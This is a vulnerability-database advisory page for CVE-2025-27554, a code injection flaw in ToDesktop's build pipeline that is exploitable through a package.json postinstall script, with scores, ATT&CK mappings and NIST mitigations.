Cyber Resilience

CVE-2025-27554

CriticalRCE

Published: 01 March 2025

Published
01 March 2025
Modified
15 April 2026
KEV Added
Patch
CVSS Score v3.1 9.9 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
EPSS Score 0.0058 69.4th percentile
Risk Priority 20 60% EPSS · 20% KEV · 20% CVSS

Summary

CVE-2025-27554 is a critical-severity Code Injection (CWE-94) vulnerability in Kibty (inferred from references). Its CVSS base score is 9.9 (Critical).

Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190); ranked in the top 30.6% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog.

The strongest mitigations our analysis identified are NIST 800-53 SI-2 (Flaw Remediation) and CM-10 (Software Usage Restrictions).

Deeper analysis

CVE-2025-27554 is a code injection vulnerability (CWE-94) in ToDesktop versions before 2024-10-03, a component used by Cursor before 2024-10-03 and other applications. It enables remote attackers to execute arbitrary commands on the build server—for instance, reading secrets from the desktopify config.prod.json file—and subsequently deploy updates to any app. This flaw stems from a postinstall script in package.json and carries a CVSS v3.1 base score of 9.9 (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H), indicating critical severity due to its network accessibility, low attack complexity, and broad impact.

Attackers require only low privileges (PR:L) to exploit the vulnerability remotely without user interaction. Successful exploitation grants arbitrary command execution on the build server, allowing attackers to access sensitive configuration data and push malicious updates to affected applications, potentially compromising entire deployment pipelines.

Advisories and related posts, including ToDesktop's security incident report (https://www.todesktop.com/blog/posts/security-incident-at-todesktop), an analysis at https://kibty.town/blog/todesktop, and Hacker News discussion (https://news.ycombinator.com/item?id=43210858), detail the issue published on 2025-03-01. Mitigation involves updating to ToDesktop 2024-10-03 or later to address the postinstall script vulnerability.

No exploitation occurred in the wild.

EU & UK References

Vulnerability details

ToDesktop before 2024-10-03, as used by Cursor before 2024-10-03 and other applications, allows remote attackers to execute arbitrary commands on the build server (e.g., read secrets from the desktopify config.prod.json file), and consequently deploy updates to any app, via a…

more

postinstall script in package.json. No exploitation occurred.

CWE(s)

Related Threats

MITRE ATT&CK Enterprise TechniquesAI

T1190 Exploit Public-Facing Application Initial Access
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
T1059 Command and Scripting Interpreter Execution
Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries.
T1195.002 Compromise Software Supply Chain Initial Access
Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise.
Why these techniques?

Code injection (CWE-94) enables remote arbitrary command execution on the build server (T1190, T1059), directly facilitating supply chain compromise by deploying malicious updates to apps (T1195.002).

Confidence: HIGH · MITRE ATT&CK Enterprise v19.0

CVEs Like This One

CVE-2026-27577Shared CWE-94
CVE-2024-54756Shared CWE-94
CVE-2024-21760Shared CWE-94
CVE-2024-55028Shared CWE-94
CVE-2025-2303Shared CWE-94
CVE-2026-41258Shared CWE-94
CVE-2025-67847Shared CWE-94
CVE-2025-58764Shared CWE-94
CVE-2026-6543Shared CWE-94
CVE-2025-67979Shared CWE-94

Affected Assets

Kibty
inferred from references and description; NVD did not file a CPE for this CVE

Mitigating Controls

Mitigating Controls (NIST 800-53 r5) AI

prevent

Requires timely installation of vendor patches for critical flaws like the postinstall script code injection in ToDesktop, directly eliminating the vulnerability.

preventdetect

Enables scanning and monitoring of third-party dependencies such as ToDesktop npm packages to identify and address known CVEs like CVE-2025-27554 before exploitation.

prevent

Restricts use of unapproved or vulnerable software like pre-2024-10-03 ToDesktop versions, preventing installation and execution of the malicious postinstall script.

References